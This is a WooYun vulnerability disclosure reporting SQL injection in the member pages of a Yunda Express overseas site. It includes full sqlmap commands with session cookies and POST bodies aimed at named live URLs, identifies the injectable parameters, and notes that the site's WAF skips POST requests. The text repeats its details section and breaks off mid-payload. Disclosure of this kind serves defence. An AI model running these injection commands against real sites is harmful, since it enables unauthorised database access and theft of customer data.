当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109545

漏洞标题:韵达快递某站业务高危SQL注入打包

相关厂商:韵达快递

漏洞作者: answer

提交时间:2015-04-22 09:27

修复时间:2015-06-06 17:36

公开时间:2015-06-06 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-22: 细节已通知厂商并且等待厂商处理中
2015-04-22: 厂商已经确认,细节仅向厂商公开
2015-05-02: 细节向核心白帽子及相关领域专家公开
2015-05-12: 细节向普通白帽子公开
2015-05-22: 细节向实习白帽子公开
2015-06-06: 细节向公众公开

简要描述:

rt

详细说明:

期前一个提交的是在注册的地方,没想到在注册之后还有,感觉这套系统真的问题多啊 所以就打包交了
上次忘记说了,这个站还有安全狗,但是好像只对get请求做防护,post没有。
漏洞网址:
http://www.yundaex.us/
注册之后再登陆
注入一:
我的折扣码,点击查询,再截包,跑sqlmap

1.png


sqlmap -u "www.yundaex.us/member/zhekouma.aspx?m=12" --cookie "ASP.NET_SessionId=3iehzmofoi2zparbwkgptkib; safedog-flow-item=41C74757AA5D4FFA6B32733D76F9EB51; CNZZDATA1253039080=187766858-1429603298-%7C1429609411; Hm_lvt_58f731f2019a9b3ab2c7c14a1b65e037=1429607040; Hm_lpvt_58f731f2019a9b3ab2c7c14a1b65e037=1429610212" --data "__VIEWSTATE=%2FwEPDwUKMTM4MDc5NzUwNg9kFgICAw9kFggCAQ9kFhBmDxYCHgRUZXh0BQxhbnN3ZXJhbnN3ZXJkAgIPFgIfAAVoPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MjkiPue9kei0rei9rOi%2FkOacjeWKoeWPiuaUtui0uTwvYT48L2Rpdj5kAgQPFgIfAAWEBTxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTM4Ij7lhY3otKPmnaHmrL48L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzkiPuacjeWKoeadoeasvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00MCI%2B5L%2Bd6Zmp5LiO6LWU5LuY5p2h5qy%2BPC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTEzIj7npoHlr4Tnianlk4HojIPlm7Q8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDMiPuW4uOingemXrumimDwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0xNiI%2B5a%2BE5Lu25rOo5oSP5LqL6aG5PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTQyIj7pmpDnp4HmnaHmrL48L2E%2BPC9kaXY%2BZAIGDxYCHwAF4gI8ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0yIj7ph43opoHlhazlkYo8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MSI%2B6Z%2B16L6%2B5paw6Ze7PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTMyIj7ooYzkuJrotYTorq88L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzMiPue%2BjuWbvemftei%2BvjwvYT48L2Rpdj5kAggPFgIfAAVYPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MyI%2B6Z%2B16L6%2B566A5LuLPC9hPjwvZGl2PmQCCg8WAh8ABbgBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzQiPuWmguS9leWKoOebn%2Bmftei%2BvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NCI%2B5ZWG5Yqh5ZCI5L2cPC9hPjwvZGl2PmQCDA8WAh8AZWQCDg8WAh8ABbIBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDUiPuS8mOaDoOS%2FoeaBrzwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NiI%2B5rW35reY572R56uZPC9hPjwvZGl2PmQCAg9kFgICAw8WAh8ABckBPGRpdiAgc3R5bGU9InBhZGRpbmc6M3B4Ij48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdHh4LmFzcHg%2FaWQ9MTE1IiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9Ii9hZG1pbi95ZE5ld3MvdXBpbWcvMjAxNTAzMTcyMDQzMjAxNzQvMjAxNTAzMTcyMDQzMjAxNzUxLmpwZyIgd2lkdGg9IjE0MCIgaGVpZ2h0PSI1NSIgLz48L2E%2BPC9kaXY%2BZAIFDxYCHwAFzwc8dHIgIGJnY29sb3I9IiNGRkZGRkYiIG9uTW91c2VPdmVyPSJ0aGlzLnN0eWxlLmJhY2tncm91bmQ9JyNERUVGRkUnIiBvbk1vdXNlT3V0PSJ0aGlzLnN0eWxlLmJhY2tncm91bmQ9JyNGRkZGRkYnIj48dGQgYWxpZ249ImNlbnRlciIgaGVpZ2h0PSIyNyI%2BOVBSN0tXNFI3QjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPiQzLjAwPC90ZD48dGQgYWxpZ249ImNlbnRlciI%2BMjAxNS0wNi0xNTwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPuacquS9v%2BeUqDwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPuS4reWbvTwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPjIwMTUtMDQtMjE8L3RkPjwvdHI%2BPHRyICBiZ2NvbG9yPSIjRkZGRkZGIiBvbk1vdXNlT3Zlcj0idGhpcy5zdHlsZS5iYWNrZ3JvdW5kPScjREVFRkZFJyIgb25Nb3VzZU91dD0idGhpcy5zdHlsZS5iYWNrZ3JvdW5kPScjRkZGRkZGJyI%2BPHRkIGFsaWduPSJjZW50ZXIiIGhlaWdodD0iMjciPjlRWDdQS1UwMU88L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4kMy4wMDwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPjIwMTUtMDYtMTU8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj7mnKrkvb%2FnlKg8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj7kuK3lm708L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4yMDE1LTA0LTIxPC90ZD48L3RyPjx0ciAgYmdjb2xvcj0iI0ZGRkZGRiIgb25Nb3VzZU92ZXI9InRoaXMuc3R5bGUuYmFja2dyb3VuZD0nI0RFRUZGRSciIG9uTW91c2VPdXQ9InRoaXMuc3R5bGUuYmFja2dyb3VuZD0nI0ZGRkZGRiciPjx0ZCBhbGlnbj0iY2VudGVyIiBoZWlnaHQ9IjI3Ij44QkdPMlE5UDNBPC90ZD48dGQgYWxpZ249ImNlbnRlciI%2BJDMuMDA8L3RkPjx0ZCBhbGlnbj0iY2VudGVyIj4yMDE1LTA2LTE1PC90ZD48dGQgYWxpZ249ImNlbnRlciI%2B5pyq5L2%2F55SoPC90ZD48dGQgYWxpZ249ImNlbnRlciI%2B5Lit5Zu9PC90ZD48dGQgYWxpZ249ImNlbnRlciI%2BMjAxNS0wNC0yMTwvdGQ%2BPC90cj5kAgYPZBYCZg8WAh8ABZAMIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49MjA5MTM4MzEwOCZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71Sb21hbnRpYzwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTMxMjU0NjA5NDYmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9RW1tYTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTIzNjM5MDA5NzcmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9QW5nZWxpbmE8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yOTA0MDEzMjU0JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUFsaXNhPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49Mjc1MzQxOTYyNSZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71Bbm5hPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49MzAzNjkxNzIyJmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUVsdmlyYTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTMxNTA4OTQ2NzMmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9RGVtaTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTExMDE1MjA4MjUmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9TWFuZHk8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yOTkzNDMzMjUzJmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvVNvcmFrYTwvYT48L2xpPmRk4L%2FbdXxdZjeq%2F0ryi%2F%2B2HH%2FEcNLLSAK%2BQILsSXCaGJ4%3D&hfMemberId=5219&memberLeft1%24HiddenField1=0&memberLeft1%24HiddenField2=0&ddlIsUsed=&btnSelect=%E6%9F%A5+%E8%AF%A2"
参数:hfMemberId 存在注入
结果

3.jpg


注入点二:
关税信息的地方

2.png


点击查询,截包,放sqlmap
sqlmap -u "www.yundaex.us/Member/GuanShuiList.aspx?m=17" --cookie "ASP.NET_SessionId=3iehzmofoi2zparbwkgptkib; safedog-flow-item=41C74757AA5D4FFA6B32733D76F9EB51; CNZZDATA1253039080=187766858-1429603298-%7C1429619965; Hm_lvt_58f731f2019a9b3ab2c7c14a1b65e037=1429607040; Hm_lpvt_58f731f2019a9b3ab2c7c14a1b65e037=1429623977" --data "__VIEWSTATE=%2FwEPDwUKLTgwMzg5MDkwMg9kFgICAQ9kFggCAQ9kFhBmDxYCHgRUZXh0BQxhbnN3ZXJhbnN3ZXJkAgIPFgIfAAVoPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MjkiPue9kei0rei9rOi%2FkOacjeWKoeWPiuaUtui0uTwvYT48L2Rpdj5kAgQPFgIfAAWEBTxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTM4Ij7lhY3otKPmnaHmrL48L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzkiPuacjeWKoeadoeasvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00MCI%2B5L%2Bd6Zmp5LiO6LWU5LuY5p2h5qy%2BPC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTEzIj7npoHlr4Tnianlk4HojIPlm7Q8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDMiPuW4uOingemXrumimDwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0xNiI%2B5a%2BE5Lu25rOo5oSP5LqL6aG5PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTQyIj7pmpDnp4HmnaHmrL48L2E%2BPC9kaXY%2BZAIGDxYCHwAF4gI8ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0yIj7ph43opoHlhazlkYo8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MSI%2B6Z%2B16L6%2B5paw6Ze7PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTMyIj7ooYzkuJrotYTorq88L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzMiPue%2BjuWbvemftei%2BvjwvYT48L2Rpdj5kAggPFgIfAAVYPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MyI%2B6Z%2B16L6%2B566A5LuLPC9hPjwvZGl2PmQCCg8WAh8ABbgBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzQiPuWmguS9leWKoOebn%2Bmftei%2BvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NCI%2B5ZWG5Yqh5ZCI5L2cPC9hPjwvZGl2PmQCDA8WAh8AZWQCDg8WAh8ABbIBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDUiPuS8mOaDoOS%2FoeaBrzwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NiI%2B5rW35reY572R56uZPC9hPjwvZGl2PmQCAg9kFgICAw8WAh8ABckBPGRpdiAgc3R5bGU9InBhZGRpbmc6M3B4Ij48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdHh4LmFzcHg%2FaWQ9MTE1IiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9Ii9hZG1pbi95ZE5ld3MvdXBpbWcvMjAxNTAzMTcyMDQzMjAxNzQvMjAxNTAzMTcyMDQzMjAxNzUxLmpwZyIgd2lkdGg9IjE0MCIgaGVpZ2h0PSI1NSIgLz48L2E%2BPC9kaXY%2BZAIGDxYCHwBlZAIHD2QWAmYPFgIfAAWQDCA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTIwOTEzODMxMDgmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9Um9tYW50aWM8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0zMDM2OTE3MjImYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9RWx2aXJhPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49Mjk5MzQzMzI1MyZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71Tb3Jha2E8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yNzUzNDE5NjI1JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUFubmE8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0yMzYzOTAwOTc3JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUFuZ2VsaW5hPC9hPjwvbGk%2BIDxsaT48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3dwYS5xcS5jb20vbXNncmQ%2Fdj0zJmFtcDt1aW49MTEwMTUyMDgyNSZhbXA7c2l0ZT1xcSZhbXA7bWVudT15ZXMiDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNsYXNzPSJxcV9pY29uIj7kuK3lm71NYW5keTwvYT48L2xpPiA8bGk%2BPGEgdGFyZ2V0PSJfYmxhbmsiIGhyZWY9Imh0dHA6Ly93cGEucXEuY29tL21zZ3JkP3Y9MyZhbXA7dWluPTI5MDQwMTMyNTQmYW1wO3NpdGU9cXEmYW1wO21lbnU9eWVzIg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjbGFzcz0icXFfaWNvbiI%2B5Lit5Zu9QWxpc2E8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0zMTI1NDYwOTQ2JmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvUVtbWE8L2E%2BPC9saT4gPGxpPjxhIHRhcmdldD0iX2JsYW5rIiBocmVmPSJodHRwOi8vd3BhLnFxLmNvbS9tc2dyZD92PTMmYW1wO3Vpbj0zMTUwODk0NjczJmFtcDtzaXRlPXFxJmFtcDttZW51PXllcyINCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2xhc3M9InFxX2ljb24iPuS4reWbvURlbWk8L2E%2BPC9saT5kZJUr7q50HOu2ECsQKqFVBUPIJ2%2B8erGXmTRuQTIv1hjj&hfMid=5219&memberLeft1%24HiddenField1=0&memberLeft1%24HiddenField2=0&txtsubnumber=&ddl_PayState=0&btnSelect=%E6%9F%A5%E8%AF%A2" --dbs
参数:hfMid 存在注入
这次就用 当前用户来证明

4.png


建议对这套程序做整体测试,感觉问题很多

漏洞证明:

期前一个提交的是在注册的地方,没想到在注册之后还有,感觉这套系统真的问题多啊 所以就打包交了
上次忘记说了,这个站还有安全狗,但是好像只对get请求做防护,post没有。
漏洞网址:
http://www.yundaex.us/
注册之后再登陆
注入一:
我的折扣码,点击查询,再截包,跑sqlmap

1.png


sqlmap -u "www.yundaex.us/member/zhekouma.aspx?m=12" --cookie "ASP.NET_SessionId=3iehzmofoi2zparbwkgptkib; safedog-flow-item=41C74757AA5D4FFA6B32733D76F9EB51; CNZZDATA1253039080=187766858-1429603298-%7C1429609411; Hm_lvt_58f731f2019a9b3ab2c7c14a1b65e037=1429607040; Hm_lpvt_58f731f2019a9b3ab2c7c14a1b65e037=1429610212" --data "__VIEWSTATE=%2FwEPDwUKMTM4MDc5NzUwNg9kFgICAw9kFggCAQ9kFhBmDxYCHgRUZXh0BQxhbnN3ZXJhbnN3ZXJkAgIPFgIfAAVoPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MjkiPue9kei0rei9rOi%2FkOacjeWKoeWPiuaUtui0uTwvYT48L2Rpdj5kAgQPFgIfAAWEBTxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTM4Ij7lhY3otKPmnaHmrL48L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzkiPuacjeWKoeadoeasvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00MCI%2B5L%2Bd6Zmp5LiO6LWU5LuY5p2h5qy%2BPC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTEzIj7npoHlr4Tnianlk4HojIPlm7Q8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDMiPuW4uOingemXrumimDwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0xNiI%2B5a%2BE5Lu25rOo5oSP5LqL6aG5PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTQyIj7pmpDnp4HmnaHmrL48L2E%2BPC9kaXY%2BZAIGDxYCHwAF4gI8ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD0yIj7ph43opoHlhazlkYo8L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MSI%2B6Z%2B16L6%2B5paw6Ze7PC9hPjwvZGl2PjxkaXYgY2xhc3M9Iml0ZW0iPjxhIGhyZWY9Imh0dHA6Ly93d3cueXVuZGFleC51cy9saXN0LmFzcHg%2Fc2lkPTMyIj7ooYzkuJrotYTorq88L2E%2BPC9kaXY%2BPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzMiPue%2BjuWbvemftei%2BvjwvYT48L2Rpdj5kAggPFgIfAAVYPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MyI%2B6Z%2B16L6%2B566A5LuLPC9hPjwvZGl2PmQCCg8WAh8ABbgBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9MzQiPuWmguS9leWKoOebn%2Bmftei%2BvjwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NCI%2B5ZWG5Yqh5ZCI5L2cPC9hPjwvZGl2PmQCDA8WAh8AZWQCDg8WAh8ABbIBPGRpdiBjbGFzcz0iaXRlbSI%2BPGEgaHJlZj0iaHR0cDovL3d3dy55dW5kYWV4LnVzL2xpc3QuYXNweD9zaWQ9NDUiPuS8mOaDoOS%2FoeaBrzwvYT48L2Rpdj48ZGl2IGNsYXNzPSJpdGVtIj48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdC5hc3B4P3NpZD00NiI%2B5rW35reY572R56uZPC9hPjwvZGl2PmQCAg9kFgICAw8WAh8ABckBPGRpdiAgc3R5bGU9InBhZGRpbmc6M3B4Ij48YSBocmVmPSJodHRwOi8vd3d3Lnl1bmRhZXgudXMvbGlzdHh4LmFzcHg%2FaWQ9MTE1IiB0YXJnZXQ9Il9ibGFuayI%2BPGltZyBzcmM9Ii9hZG1pbi95ZE5ld3MvdXBpbWcvMjAxNTAzMTcyMDQzMjAxNzQvMjAxNTAzMTcyMDQzMjAxNzUxLmpwZyIgd2lkdGg9IjE0MCIgaGVpZ2h0PSI1NSIgLz48L2E%2BPC9kaXY%2BZAIFDxYCHwAFzwc8dHIgIGJnY29sb3I9IiNGRkZGRkYiIG9uTW91c2VPdmVyPSJ0aGlzLnN0eWxlLmJhY2tncm91bmQ9JyNERUVGRkUnIiBvbk1vdXNlT3V0PSJ0aGlzLnN0eWxlLmJhY2tncm91bmQ9JyNGRkZGRkYnIj48dGQgYWxpZ249ImNlbnRlciIgaGVpZ2h0PSIyNyI%2BOVBSN0tXNFI3QjwvdGQ%2BPHRkIGFsaWduPSJjZW50ZXIiPiQzLjAwPC90ZD48dGQgYWxpZ249ImNlbnRlciI%2BMjAxNS0wNi0xNTwvdGQ%2BPHRkIGFsaWdu